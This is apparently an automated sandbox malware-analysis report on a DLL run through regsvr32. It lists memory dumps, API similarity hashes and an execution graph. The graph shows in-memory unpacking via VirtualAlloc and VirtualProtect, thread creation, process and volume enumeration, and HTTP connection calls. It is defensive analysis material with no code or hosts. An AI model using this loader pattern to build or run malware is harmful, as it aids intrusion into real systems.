                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID: InitCommonControlsEx
• API String ID: 310444273-2357626986
• Opcode ID: 8dbd0aa5fde36d7b5e6cb1899159c4ed2c56fe2f7d6b24fd7874968b54380210
• Instruction ID: f62595b032523d17c900e76380b3b1b0919be40ea1c6a8f24e204b7e091af8e3
• Opcode Fuzzy Hash: 8dbd0aa5fde36d7b5e6cb1899159c4ed2c56fe2f7d6b24fd7874968b54380210
• Instruction Fuzzy Hash: 5B01A832201B49C5DF968F25E88439973B1E75CF98F298025DA4D47768DE34D999C340
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID: ImageList_Destroy
• API String ID: 310444273-3359732376
• Opcode ID: 2f69f390f08cabe971752de3f2e1f74dbad47029e8ba37f0edde313316be047c
• Instruction ID: fc9d4f3ab9812608bb7598174e0936c7842bd86c54f2c860905a51db673548c1
• Opcode Fuzzy Hash: 2f69f390f08cabe971752de3f2e1f74dbad47029e8ba37f0edde313316be047c
• Instruction Fuzzy Hash: B801E832202F89C9DB868F25E58039963A5E75CF98F199025DA4D4B365EE38C9D9C340
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID: ImageList_LoadImageA
• API String ID: 310444273-439603757
• Opcode ID: 5c8abf0ad6d0886b35202916cecf62b478a1a63f1eb341b11915c57674ea264a
• Instruction ID: b162de2cc547ba2fb40fc9625ead035fa35e3f0c253d06df2c93193ac548e298
• Opcode Fuzzy Hash: 5c8abf0ad6d0886b35202916cecf62b478a1a63f1eb341b11915c57674ea264a
• Instruction Fuzzy Hash: F401A836206F89C5DB968F25E48439973A5F75DF88F188025DA4D4B368EF34C99AC350
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(?,?,000000FF,0000000180020F35,?,?,00000000,0000000180026ED2,?,?,00000000,0000000180026F9F), ref: 0000000180020EFB
• GetProcAddress.KERNEL32(?,?,000000FF,0000000180020F35,?,?,00000000,0000000180026ED2,?,?,00000000,0000000180026F9F), ref: 0000000180020F10
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 1646373207-1276376045
• Opcode ID: 6ed72e733c6f008c7098c3b5b7f13a9d79aaf72a9cf791fed3c8d6f58eeaf8f4
• Instruction ID: 9e99631b602e4bde0e19571eee5a704d3350a5a8f3bb0223c5a7da61b52f8d31
• Opcode Fuzzy Hash: 6ed72e733c6f008c7098c3b5b7f13a9d79aaf72a9cf791fed3c8d6f58eeaf8f4
• Instruction Fuzzy Hash: A0E0127075270C82FFEB9B61A8843E513516B4D7C5F499028A51E077A1EF28D75DC310
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: _errno
• String ID:
• API String ID: 2918714741-0
• Opcode ID: 792e8745d615aee98d4485586d497814bb8477c1f23f84a82cd00b539724f549
• Instruction ID: a3bd9a9b8aab3ab6241a23ec7f6c8ac6f45c3634371f3e3fe77c0a781748e8d1
• Opcode Fuzzy Hash: 792e8745d615aee98d4485586d497814bb8477c1f23f84a82cd00b539724f549
• Instruction Fuzzy Hash: 8C8107322052C889EAE34A2895447EE7761A3597DAF28C221F7E507AD5CE36C65E8708
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: BitmapMenu$BitmapsCheckCreateDimensionsItemLoadMark
• String ID:
• API String ID: 527726921-0
• Opcode ID: 7b5d86ebf2082e61a4b8e1dc66e50425af0bd6ae50d0e9893398f99941ef6f03
• Instruction ID: ab7879270879aa6b3bae8fb9ee09113f43a0085c2d092503d725c6fc7c4c0bbc
• Opcode Fuzzy Hash: 7b5d86ebf2082e61a4b8e1dc66e50425af0bd6ae50d0e9893398f99941ef6f03
• Instruction Fuzzy Hash: 9A51DC32710F8886EB96DF24E8497D933A5F78CB84F858026EB4943B50EF38DA58C740
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: _getptd$BaseImage
• String ID:
• API String ID: 2482573191-0
• Opcode ID: 30516852e28a952734e1d0625c4f2c86422a9109b781c16d58738f16741b2c2d
• Instruction ID: 8f55a6433e090b6ac0fbaa038653dff6cf23cafeb96d3631585517fc99e1b18f
• Opcode Fuzzy Hash: 30516852e28a952734e1d0625c4f2c86422a9109b781c16d58738f16741b2c2d
• Instruction Fuzzy Hash: 31419132600A4985EBA3EB15D4823FDA791AB8DBD5F95C121FB59477E2CF34C68E8300
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 5d4fc64fa68401ac22ac86c66de0f044c2a7129c20872a196546d2c4accfd566
• Instruction ID: c16e0e0e78a499e2ca79a6ec12ba22cc8830681fc3ecca116b749b798c8ae8a0
• Opcode Fuzzy Hash: 5d4fc64fa68401ac22ac86c66de0f044c2a7129c20872a196546d2c4accfd566
• Instruction Fuzzy Hash: 8D319132310B5582FB96DB13E8547E96760EB8CFC4F048131BE1A4BB99DF29C24A8300
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: ParentWindow$CallProcRect
• String ID:
• API String ID: 640952022-0
• Opcode ID: 3a6e834603606daeb17b68b6877642d0b5c5b2869fc060148c92c94b17035ed9
• Instruction ID: 3f0024fa22fb02943d83acd78c3ac48632e632c280785a7ce128af42f74ca6e3
• Opcode Fuzzy Hash: 3a6e834603606daeb17b68b6877642d0b5c5b2869fc060148c92c94b17035ed9
• Instruction Fuzzy Hash: DD315E3061464891FAE6DB81A5807ED73A1FBACBC0F14C121FE4603B99CE78CA5C8701
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Resource$FindFreeLoadLock
• String ID:
• API String ID: 1078018258-0
• Opcode ID: 4ac4820cab029e278d4a0c98603d87ff7d551b39c9db84fcfa17d2f06afe9701
• Instruction ID: 69967b995c0393e2effd2d8ed2c2215b5f31fca2a0db19b53045e9dc830d743f
• Opcode Fuzzy Hash: 4ac4820cab029e278d4a0c98603d87ff7d551b39c9db84fcfa17d2f06afe9701
• Instruction Fuzzy Hash: 06214F36602A8986E7999B56D5443EA7360F38DFC4F48C021EF5507754DF39DAA9C340
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Window$MessageSend
• String ID:
• API String ID: 1496643700-0
• Opcode ID: 605e714b6c71993bfaa07453adaf1c1d76bdc130fbb0fabf031c4d216f220953
• Instruction ID: fc9a471d184917d6cb748f655331fd99bdc735ecce10370ce1d1e568dc173544
• Opcode Fuzzy Hash: 605e714b6c71993bfaa07453adaf1c1d76bdc130fbb0fabf031c4d216f220953
• Instruction Fuzzy Hash: 96115736205B4887EB529F45A4007DAB7A0FBCDBD0F288525FE8907759DF7CD6488B40
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: MessageSend$Capture
• String ID:
• API String ID: 1665607226-0
• Opcode ID: 60364d07ba75760cf71bad0e019b1f9e807bf02d4eb6f8eeca038063c35c156c
• Instruction ID: bbaa5c65138986585612c4aa79743df0a7e6e48727a73170b0c10e54f31dc3ba
• Opcode Fuzzy Hash: 60364d07ba75760cf71bad0e019b1f9e807bf02d4eb6f8eeca038063c35c156c
• Instruction Fuzzy Hash: 3D11B136710A4987EBA29B25E455BDE7BA0FBCCBC9F589010EE0907B15DE79C1488B00
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Close$CreatePrivateProfileStringValueWriteswprintf
• String ID:
• API String ID: 2653322536-0
• Opcode ID: c9f5dc270799bd5522e95d003daec111fa4deb5f29ca4711c4ba892838f7a073
• Instruction ID: 5b29882e868a6fd1e16fa975dfc61378143b8e5f2b480f48924c4e52e78407a7
• Opcode Fuzzy Hash: c9f5dc270799bd5522e95d003daec111fa4deb5f29ca4711c4ba892838f7a073
• Instruction Fuzzy Hash: BA11C472315A8886EB929B51A9447DAB361A74CFD4F548021BE4E03B54DE38C2898700
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: EnableFocusItemMenuMessageParentSend
• String ID:
• API String ID: 2297321873-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Window$Item
• String ID:
• API String ID: 369458955-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: TextWindow$lstrcmplstrlen
• String ID:
• API String ID: 330964273-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Resource$FindFreeLoadLock
• String ID:
• API String ID: 1078018258-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: CriticalDeleteSection$Freefree
• String ID:
• API String ID: 1250194111-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Window$ActiveEnable$FreeResource
• String ID:
• API String ID: 253586258-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: DecodePointer_errno_flush_freebuf
• String ID:
• API String ID: 1889905870-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Window$ClientEnabledFromParentPointScreen
• String ID:
• API String ID: 1871804413-0
Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: __doserrno_errno
• String ID:
• API String ID: 921712934-0
Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: ParentWindow$Long
• String ID:
• API String ID: 941798831-0
Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: _getptd
• String ID: csm$csm
• API String ID: 3186804695-3733052814
Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: _errno
• String ID: 1
• API String ID: 2918714741-2212294583
Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: Window$CtrlRect$ClientLongMessageScreenSend
• String ID: @
• API String ID: 1956310361-2766056989
Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: _getptd
• String ID: csm
• API String ID: 3186804695-1018135373
                                                                                                                                                                                    • Opcode ID: bf9ab7e349eea3d33eec0258e5e4178034c863033116fc655711d284816704fa
                                                                                                                                                                                    • Instruction ID: 961ad291d77580d6b7f4699af0e9b54f24cfd1812cb26fc8286fb2cc02644495
                                                                                                                                                                                    • Opcode Fuzzy Hash: bf9ab7e349eea3d33eec0258e5e4178034c863033116fc655711d284816704fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0801403254168889DBB7DF61C8513EE3364E76CB89F558125EA090A685DF24C788C741
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32 ref: 0000000180017E1F
• PathFindExtensionA.SHLWAPI ref: 0000000180017E35
  • Part of subcall function 0000000180017974: GetModuleHandleA.KERNEL32 ref: 00000001800179C5
  • Part of subcall function 0000000180017974: GetProcAddress.KERNEL32 ref: 00000001800179D8
  • Part of subcall function 0000000180017974: ConvertDefaultLocale.KERNEL32 ref: 0000000180017A07
  • Part of subcall function 0000000180017974: ConvertDefaultLocale.KERNEL32 ref: 0000000180017A13
  • Part of subcall function 0000000180017974: GetProcAddress.KERNEL32 ref: 0000000180017A2B
  • Part of subcall function 0000000180017974: ConvertDefaultLocale.KERNEL32 ref: 0000000180017A55
  • Part of subcall function 0000000180017974: ConvertDefaultLocale.KERNEL32 ref: 0000000180017A61
  • Part of subcall function 0000000180017974: GetModuleFileNameA.KERNEL32 ref: 0000000180017B22
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindHandlePath
• String ID: %s%s.dll
• API String ID: 288242826-1649984862
• Opcode ID: 224d040147359b70b3aaf82dcb824328f28c0b07b9284d7ade4124a585a109b0
• Instruction ID: 68476159a46b848b6511f3017caa613d0ba04a07d827ccd93729d57f6697ebf0
• Opcode Fuzzy Hash: 224d040147359b70b3aaf82dcb824328f28c0b07b9284d7ade4124a585a109b0
• Instruction Fuzzy Hash: 91012131318A8985EBA29B15E8513DA23A0F39CBC5F808151F68D47766DE2DC60DC700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: CloseCreate$Open
• String ID: Settings
• API String ID: 1740278721-473154195
• Opcode ID: 86b8f25331f3e0e0b2f4df3264e5005ca27c3d1a475327831ded131a50054760
• Instruction ID: 78740abde83cd2bc7836165233464118928347f306f647dc62b8ea32dc52b10a
• Opcode Fuzzy Hash: 86b8f25331f3e0e0b2f4df3264e5005ca27c3d1a475327831ded131a50054760
• Instruction Fuzzy Hash: 40F04932618B8487EB518B25F0847AAB7A0F78CBD5F544225FB8D06B69DF3CC1888F00
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterValue
• String ID:
• API String ID: 3969253408-0
• Opcode ID: ae274e6c84a70c9e0738021e81f9a9f4afc20c491fdc5af10655d7bbd26850bb
• Instruction ID: 28652449caf400a93a67b6eb8d62305aa1df4026e5183692b07ceb4d29ee1308
• Opcode Fuzzy Hash: ae274e6c84a70c9e0738021e81f9a9f4afc20c491fdc5af10655d7bbd26850bb
• Instruction Fuzzy Hash: FD01FB31200A4896EBA68F16E4D17EA6364F74CBC1F4A8465E75A43764CF28D6898700
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage:17.9%
Dynamic/Decrypted Code Coverage:99%
Signature Coverage:4%
Total number of Nodes:101
Total number of Limit Nodes:11
Execution graph for the 02C80000 region of regsvr32 (process 8); the node/edge dump of the rendered graph is omitted and only the API calls it reaches are kept:
• Entry path: 2c80000 → 2c80185 → 2c803f2 VirtualAlloc → 2c80418 → 2c804dc GetNativeSystemInfo → 2c80518 VirtualAlloc → 2c80536 VirtualAlloc → 2c8054b, which loops through 2c80971 VirtualProtect, then 2c80998 → 2c809e4 RtlAvlRemoveNode → 2c80a09
• Other paths: 2cdd97b CreateThread (in 2cdd864), 2ced8ac CreateFileW (in 2ced79c, also reached through 2ce00f0), 2cd3e08 FindCloseChangeNotification (in 2cd3a18), 2ceca5f Process32FirstW (in 2cec860), 2cdfac3 GetVolumeInformationW (in 2cdf994), 2cde202 InternetConnectW (in 2cde0d4), 2cd930d HttpOpenRequestW (in 2cd91ec)

Control-flow Graph

Control-flow graph for the function at 2c80000-2c80a3f; the basic-block edge dump of the rendered graph, with its Executed/Not Executed colouring, is omitted. Blocks that contain API calls: 2c80000-2c80416 (two calls to 2c80a40, then VirtualAlloc), 2c804dc-2c80512 (GetNativeSystemInfo), 2c80518-2c80534 and 2c80536-2c80549 (VirtualAlloc), 2c80971-2c80981 (VirtualProtect), 2c809e4-2c80a07 (RtlAvlRemoveNode).
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.518659425.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2c80000_regsvr32.jbxd
Similarity
• API ID: Virtual$Alloc$InfoNativeNodeProtectRemoveSystem
